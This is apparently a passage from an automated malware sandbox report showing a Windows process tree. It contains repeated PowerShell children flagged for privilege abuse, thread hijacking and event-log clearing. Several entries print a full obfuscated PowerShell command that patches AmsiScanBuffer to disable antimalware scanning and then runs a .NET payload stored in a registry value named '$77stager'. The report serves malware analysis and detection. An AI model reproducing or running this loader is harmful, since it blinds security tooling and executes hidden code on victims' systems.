                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                          • Command and Scripting Interpreter: PowerShell
                          • Drops file in System32 directory
                          • Suspicious use of SetThreadContext
                          • Modifies data under HKEY_USERS
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1432
                          • C:\Windows\System32\Conhost.exe
                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            3⤵
                              PID:4380
                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:mwKHLMRidSqY{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$XNzxyIXoPCgHwE,[Parameter(Position=1)][Type]$EwUFcNJvrA)$XtPGePpDjPm=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+'f'+''+'l'+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+'D'+''+[Char](101)+''+'l'+''+[Char](101)+'g'+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+'M'+'e'+''+[Char](109)+''+[Char](111)+''+'r'+'y'+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+'l'+'e',$False).DefineType(''+[Char](77)+''+'y'+'D'+'e'+''+[Char](108)+'eg'+[Char](97)+'t'+[Char](101)+'T'+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+'a'+[Char](115)+''+'s'+','+[Char](80)+''+'u'+''+'b'+''+'l'+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+''+'d'+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+''+[Char](105)+'C'+[Char](108)+'as'+[Char](115)+''+','+''+[Char](65)+''+'u'+'t'+'o'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$XtPGePpDjPm.DefineConstructor('R'+[Char](84)+''+[Char](83)+''+[Char](112)+'e'+[Char](99)+'i'+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+''+'e'+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+[Char](121)+''+'S'+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+'ub'+[Char](108)+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$XNzxyIXoPCgHwE).SetImplementationFlags('Ru'+[Char](110)+''+'t'+''+'i'+''+[Char](109)+''+'e'+','+'M'+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+'d'+'');$XtPGePpDjPm.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+'ok'+[Char](101)+'',''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](10
1)+''+[Char](66)+''+[Char](121)+''+[Char](83)+'ig'+[Char](44)+''+[Char](78)+''+'e'+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+''+'t'+''+','+''+'V'+''+'i'+'r'+'t'+''+[Char](117)+''+[Char](97)+''+'l'+'',$EwUFcNJvrA,$XNzxyIXoPCgHwE).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+'t'+''+'i'+'me'+','+'M'+[Char](97)+'n'+[Char](97)+'ge'+[Char](100)+'');Write-Output $XtPGePpDjPm.CreateType();}$QABXNndSkEXga=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+''+[Char](111)+'ft'+[Char](46)+''+[Char](87)+'i'+[Char](110)+'3'+[Char](50)+''+[Char](46)+''+[Char](85)+''+'n'+''+[Char](115)+''+'a'+''+'f'+''+'e'+''+[Char](78)+'a'+[Char](116)+''+[Char](105)+''+'v'+'e'+[Char](77)+''+[Char](101)+''+[Char](116)+'hod'+[Char](115)+'');$RiBPJFuicuXQLZ=$QABXNndSkEXga.GetMethod('G'+[Char](101)+''+'t'+''+[Char](80)+'roc'+[Char](65)+''+[Char](100)+''+[Char](100)+''+'r'+''+[Char](101)+''+'s'+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c,'+'S'+''+'t'+''+'a'+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$idcpSqgyeuEXkOkgQmJ=mwKHLMRidSqY @([String])([IntPtr]);$VEMUjGlPKnzhHiTYJmicSl=mwKHLMRidSqY 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ytiMxqQwxWt=$QABXNndSkEXga.GetMethod(''+[Char](71)+''+[Char](101)+'t'+[Char](77)+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+'e'+[Char](72)+''+[Char](97)+''+'n'+''+'d'+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+'e'+'l'+[Char](51)+''+[Char](50)+''+'.'+'d'+[Char](108)+''+[Char](108)+'')));$oAuFaHXkYwJdlj=$RiBPJFuicuXQLZ.Invoke($Null,@([Object]$ytiMxqQwxWt,[Object](''+'L'+''+[Char](111)+''+[Char](97)+'d'+'L'+''+[Char](105)+''+[Char](98)+'ra'+[Char](114)+''+[Char](121)+'A')));$NiXCrFWvrnBqkuUtj=$RiBPJFuicuXQLZ.Invoke($Null,@([Object]$ytiMxqQwxWt,[Object]('V'+[Char](105)+''+'r'+''+[Char](116)+'u'+'a'+'lP'+'r'+'o'+'t'+''+'e'+''+[Char](99)+''+'t'+'')));$iLpFgIq=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($oAuFaHXkYwJdlj,$idcpSqgyeuEXkOkgQmJ).Invoke(''+[Char](97)+''+'m'+''+[Char](115)+'i'+[Char](46)+''+[Char](100)+''+[Char](108)+'l');$tSLCqiYZZMPTBJsst=$RiBPJFuicuXQLZ.Invoke($Null,@([Object]$iLpFgIq,[Object]('A'+'m'+'s'+[Char](105)+'S'+[Char](99)+''+'a'+''+[Char](110)+'B'+[Char](117)+'ffe'+[Char](114)+'')));$fVKMLUliJf=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NiXCrFWvrnBqkuUtj,$VEMUjGlPKnzhHiTYJmicSl).Invoke($tSLCqiYZZMPTBJsst,[uint32]8,4,[ref]$fVKMLUliJf);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$tSLCqiYZZMPTBJsst,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NiXCrFWvrnBqkuUtj,$VEMUjGlPKnzhHiTYJmicSl).Invoke($tSLCqiYZZMPTBJsst,[uint32]8,0x20,[ref]$fVKMLUliJf);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+''+'F'+''+[Char](84)+'W'+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+''+[Char](55)+''+[Char](115)+'t'+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                            2⤵
                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                            • Command and Scripting Interpreter: PowerShell
                            • Drops file in System32 directory
                            • Suspicious use of SetThreadContext
                            • Modifies data under HKEY_USERS
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1500
                            • C:\Windows\System32\Conhost.exe
                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              3⤵
                                PID:3476
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                              2⤵
                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                              • Command and Scripting Interpreter: PowerShell
                              • Drops file in System32 directory
                              • Suspicious use of SetThreadContext
                              • Modifies data under HKEY_USERS
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3808
                              • C:\Windows\System32\Conhost.exe
                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                3⤵
                                  PID:2744
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                2⤵
                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                • Command and Scripting Interpreter: PowerShell
                                • Drops file in System32 directory
                                • Suspicious use of SetThreadContext
                                • Modifies data under HKEY_USERS
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4864
                                • C:\Windows\System32\Conhost.exe
                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  3⤵
                                    PID:744
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                  2⤵
                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                  • Command and Scripting Interpreter: PowerShell
                                  • Drops file in System32 directory
                                  • Suspicious use of SetThreadContext
                                  • Modifies data under HKEY_USERS
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:3992
                                  • C:\Windows\System32\Conhost.exe
                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    3⤵
                                      PID:4448
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                    2⤵
                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                    • Command and Scripting Interpreter: PowerShell
                                    • Drops file in System32 directory
                                    • Suspicious use of SetThreadContext
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2744
                                    • C:\Windows\System32\Conhost.exe
                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      3⤵
                                        PID:2824
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                      2⤵
                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                      • Command and Scripting Interpreter: PowerShell
                                      • Drops file in System32 directory
                                      • Suspicious use of SetThreadContext
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5004
                                      • C:\Windows\System32\Conhost.exe
                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        3⤵
                                          PID:4456
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                        2⤵
                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                        • Command and Scripting Interpreter: PowerShell
                                        • Drops file in System32 directory
                                        • Suspicious use of SetThreadContext
                                        • Modifies data under HKEY_USERS
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4516
                                        • C:\Windows\System32\Conhost.exe
                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          3⤵
                                            PID:1648
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                          2⤵
                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                          • Command and Scripting Interpreter: PowerShell
                                          • Drops file in System32 directory
                                          • Suspicious use of SetThreadContext
                                          • Modifies data under HKEY_USERS
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:864
                                          • C:\Windows\System32\Conhost.exe
                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            3⤵
                                              PID:4984
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                            2⤵
                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                            • Command and Scripting Interpreter: PowerShell
                                            • Drops file in System32 directory
                                            • Suspicious use of SetThreadContext
                                            • Modifies data under HKEY_USERS
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1808
                                            • C:\Windows\System32\Conhost.exe
                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              3⤵
                                                PID:2164
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                              2⤵
                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                              • Command and Scripting Interpreter: PowerShell
                                              • Drops file in System32 directory
                                              • Suspicious use of SetThreadContext
                                              • Modifies data under HKEY_USERS
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1828
                                              • C:\Windows\System32\Conhost.exe
                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                3⤵
                                                  PID:1456
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                2⤵
                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                • Command and Scripting Interpreter: PowerShell
                                                • Drops file in System32 directory
                                                • Suspicious use of SetThreadContext
                                                • Modifies data under HKEY_USERS
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4324
                                                • C:\Windows\System32\Conhost.exe
                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  3⤵
                                                    PID:2536
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
+''+'7'+'7'+[Char](115)+''+[Char](116)+''+'a'+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                                                  2⤵
                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                  • Command and Scripting Interpreter: PowerShell
                                                  • Drops file in System32 directory
                                                  • Suspicious use of SetThreadContext
                                                  • Modifies data under HKEY_USERS
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4916
                                                  • C:\Windows\System32\Conhost.exe
                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    3⤵
                                                      PID:3320
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:DIaXiTDULkVB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wdRyNGPUAwYTnf,[Parameter(Position=1)][Type]$CrShgGGkKu)$dWUnWGxnoYE=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+'f'+[Char](108)+''+'e'+''+'c'+''+'t'+''+[Char](101)+''+[Char](100)+''+'D'+''+'e'+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+[Char](77)+''+'e'+''+'m'+''+'o'+''+[Char](114)+''+[Char](121)+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+'e'+'leg'+[Char](97)+'te'+[Char](84)+''+[Char](121)+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+''+','+''+[Char](80)+''+'u'+'bl'+'i'+'c,'+[Char](83)+''+[Char](101)+''+'a'+''+[Char](108)+''+[Char](101)+''+[Char](100)+','+[Char](65)+''+'n'+'s'+[Char](105)+''+[Char](67)+''+[Char](108)+''+'a'+''+'s'+''+[Char](115)+',A'+[Char](117)+''+[Char](116)+'o'+'C'+''+'l'+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$dWUnWGxnoYE.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+'p'+[Char](101)+''+[Char](99)+''+'i'+''+[Char](97)+''+'l'+''+'N'+''+[Char](97)+'m'+[Char](101)+''+','+''+'H'+''+'i'+''+'d'+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+','+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$wdRyNGPUAwYTnf).SetImplementationFlags(''+'R'+''+'u'+''+[Char](110)+'ti'+[Char](109)+''+[Char](101)+',M'+[Char](97)+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+'d');$dWUnWGxnoYE.DefineMethod(''+'I'+''+[Char](110)+'vo'+'k'+'e','P'+'u'+''+'b'+''+'l'+''+'i'+''+[Char](99)+''+[Char](44)+'H'+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+'ySig'+[Char](44
)+''+[Char](78)+''+[Char](101)+''+[Char](119)+'Sl'+'o'+''+'t'+''+','+''+[Char](86)+'ir'+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'',$CrShgGGkKu,$wdRyNGPUAwYTnf).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+''+[Char](105)+'me'+[Char](44)+'Ma'+'n'+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $dWUnWGxnoYE.CreateType();}$QnPKVHlkTXPUx=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+'s'+''+[Char](116)+'e'+[Char](109)+'.'+[Char](100)+'l'+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+'c'+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+'f'+[Char](116)+'.W'+'i'+''+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+''+'U'+''+[Char](110)+''+[Char](115)+''+[Char](97)+'f'+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+[Char](101)+'M'+[Char](101)+''+'t'+'h'+'o'+''+'d'+''+[Char](115)+'');$ORhrebLIXWGXKB=$QnPKVHlkTXPUx.GetMethod('G'+'e'+''+'t'+''+[Char](80)+''+'r'+'ocAd'+[Char](100)+'r'+'e'+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+'b'+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'t'+''+'a'+''+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$iRPypuuUuuydTFGLyii=DIaXiTDULkVB @([String])([IntPtr]);$vRDiSmwiHAHUxmqbXeoTxp=DIaXiTDULkVB 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$yegubNlwooW=$QnPKVHlkTXPUx.GetMethod('G'+[Char](101)+''+'t'+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+'l'+''+'e'+'Han'+[Char](100)+'l'+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+[Char](114)+'n'+[Char](101)+'l'+[Char](51)+'2.'+'d'+''+[Char](108)+''+[Char](108)+'')));$BcSrLBeVENPOvg=$ORhrebLIXWGXKB.Invoke($Null,@([Object]$yegubNlwooW,[Object](''+'L'+''+[Char](111)+''+'a'+''+[Char](100)+'Li'+'b'+''+'r'+''+[Char](97)+'r'+'y'+'A')));$PVsyJQKlgFkURgMmN=$ORhrebLIXWGXKB.Invoke($Null,@([Object]$yegubNlwooW,[Object](''+[Char](86)+'i'+[Char](114)+'tua'+[Char](108)+''+'P'+'ro'+[Char](116)+''+'e'+''+[Char](99)+''+'t'+'')));$uOqszWu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BcSrLBeVENPOvg,$iRPypuuUuuydTFGLyii).Invoke(''+'a'+''+[Char](109)+'s'+[Char](105)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$iVtBuQFdZloXdavLc=$ORhrebLIXWGXKB.Invoke($Null,@([Object]$uOqszWu,[Object]('A'+[Char](109)+'s'+[Char](105)+'S'+[Char](99)+''+'a'+'n'+[Char](66)+''+[Char](117)+''+'f'+''+[Char](102)+''+[Char](101)+'r')));$DtTbxpEuyT=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PVsyJQKlgFkURgMmN,$vRDiSmwiHAHUxmqbXeoTxp).Invoke($iVtBuQFdZloXdavLc,[uint32]8,4,[ref]$DtTbxpEuyT);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$iVtBuQFdZloXdavLc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PVsyJQKlgFkURgMmN,$vRDiSmwiHAHUxmqbXeoTxp).Invoke($iVtBuQFdZloXdavLc,[uint32]8,0x20,[ref]$DtTbxpEuyT);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SO'+'F'+''+'T'+''+[Char](87)+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+'7'+[Char](55)+''+[Char](115)+'ta'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                                                    2⤵
                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Drops file in System32 directory
                                                    • Suspicious use of SetThreadContext
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:2416
                                                    • C:\Windows\System32\Conhost.exe
                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      3⤵
                                                        PID:2108
                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:tviXYlZzDvXC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$uPUWJpKtqgrJwM,[Parameter(Position=1)][Type]$nMbWSyHtGD)$tpNRHGfaxUj=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+'f'+''+[Char](108)+''+[Char](101)+''+'c'+'t'+[Char](101)+''+'d'+''+'D'+''+'e'+''+'l'+''+'e'+''+[Char](103)+''+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+''+'m'+''+'o'+''+[Char](114)+'y'+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType('M'+'y'+''+'D'+'e'+'l'+'e'+'g'+'a'+[Char](116)+''+[Char](101)+'T'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+'s'+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+','+''+'A'+''+'n'+''+'s'+'iC'+[Char](108)+''+[Char](97)+''+'s'+''+'s'+','+[Char](65)+''+[Char](117)+''+[Char](116)+'o'+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$tpNRHGfaxUj.DefineConstructor(''+'R'+'T'+[Char](83)+''+[Char](112)+''+[Char](101)+'c'+[Char](105)+''+'a'+''+[Char](108)+'N'+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'Hi'+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+'g,'+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$uPUWJpKtqgrJwM).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+'t'+[Char](105)+'m'+[Char](101)+''+[Char](44)+'M'+[Char](97)+''+[Char](110)+'a'+[Char](103)+'e'+[Char](100)+'');$tpNRHGfaxUj.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+'e'+'',''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+''+
','+'H'+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+'Sig,N'+'e'+'wS'+'l'+''+[Char](111)+''+[Char](116)+',Vi'+[Char](114)+'t'+'u'+'a'+[Char](108)+'',$nMbWSyHtGD,$uPUWJpKtqgrJwM).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+[Char](116)+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+''+'a'+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $tpNRHGfaxUj.CreateType();}$sWlSaAwdUfNaR=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+''+'e'+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+'o'+''+'s'+''+'o'+'f'+[Char](116)+'.'+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+'ns'+'a'+''+'f'+'e'+[Char](78)+''+[Char](97)+''+[Char](116)+'i'+[Char](118)+''+'e'+''+[Char](77)+''+'e'+'t'+[Char](104)+'o'+[Char](100)+''+[Char](115)+'');$QaAaqNDqskrFcf=$sWlSaAwdUfNaR.GetMethod(''+[Char](71)+''+[Char](101)+'tP'+'r'+''+'o'+''+[Char](99)+''+[Char](65)+''+'d'+''+[Char](100)+''+'r'+''+[Char](101)+''+'s'+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+'bl'+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+'t'+''+[Char](97)+''+[Char](116)+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$feCOGfSxYwsuEUqFoQZ=tviXYlZzDvXC @([String])([IntPtr]);$BLOaJxVqqBHkofmqbWGzDq=tviXYlZzDvXC 
@([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$mGFrbRmQPCU=$sWlSaAwdUfNaR.GetMethod(''+'G'+''+[Char](101)+''+'t'+''+[Char](77)+'o'+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'H'+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+'rnel'+'3'+''+[Char](50)+''+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')));$EUPwpfZsjCkVsu=$QaAaqNDqskrFcf.Invoke($Null,@([Object]$mGFrbRmQPCU,[Object](''+[Char](76)+''+[Char](111)+'adL'+'i'+''+[Char](98)+''+'r'+''+'a'+'ryA')));$ETwJpAeliMMaAlPth=$QaAaqNDqskrFcf.Invoke($Null,@([Object]$mGFrbRmQPCU,[Object]('Vi'+'r'+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+'Pr'+[Char](111)+''+[Char](116)+''+[Char](101)+'c'+[Char](116)+'')));$JZXRGsM=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EUPwpfZsjCkVsu,$feCOGfSxYwsuEUqFoQZ).Invoke('am'+[Char](115)+''+[Char](105)+''+'.'+''+[Char](100)+'ll');$CjVgqxPmWISZegJIq=$QaAaqNDqskrFcf.Invoke($Null,@([Object]$JZXRGsM,[Object](''+[Char](65)+''+[Char](109)+''+'s'+'i'+'S'+''+[Char](99)+''+'a'+''+'n'+''+[Char](66)+''+'u'+'f'+[Char](102)+''+[Char](101)+''+'r'+'')));$gYDfvJIgzl=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ETwJpAeliMMaAlPth,$BLOaJxVqqBHkofmqbWGzDq).Invoke($CjVgqxPmWISZegJIq,[uint32]8,4,[ref]$gYDfvJIgzl);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$CjVgqxPmWISZegJIq,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ETwJpAeliMMaAlPth,$BLOaJxVqqBHkofmqbWGzDq).Invoke($CjVgqxPmWISZegJIq,[uint32]8,0x20,[ref]$gYDfvJIgzl);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+'O'+'FT'+[Char](87)+''+[Char](65)+''+'R'+'E').GetValue(''+[Char](36)+'7'+[Char](55)+'s'+[Char](116)+''+[Char](97)+'g'+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
                                                      2⤵
                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                      • Command and Scripting Interpreter: PowerShell
                                                      • Drops file in System32 directory
                                                      • Suspicious use of SetThreadContext
                                                      • Modifies data under HKEY_USERS
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:3176
                                                      • C:\Windows\System32\Conhost.exe
                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                        3⤵
                                                          PID:4980
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                      1⤵
                                                      • Indicator Removal: Clear Windows Event Logs
                                                      PID:1204
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                      1⤵
                                                        PID:1296
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                        1⤵
                                                          PID:1308
                                                        • C:\Windows\system32\svchost.exe
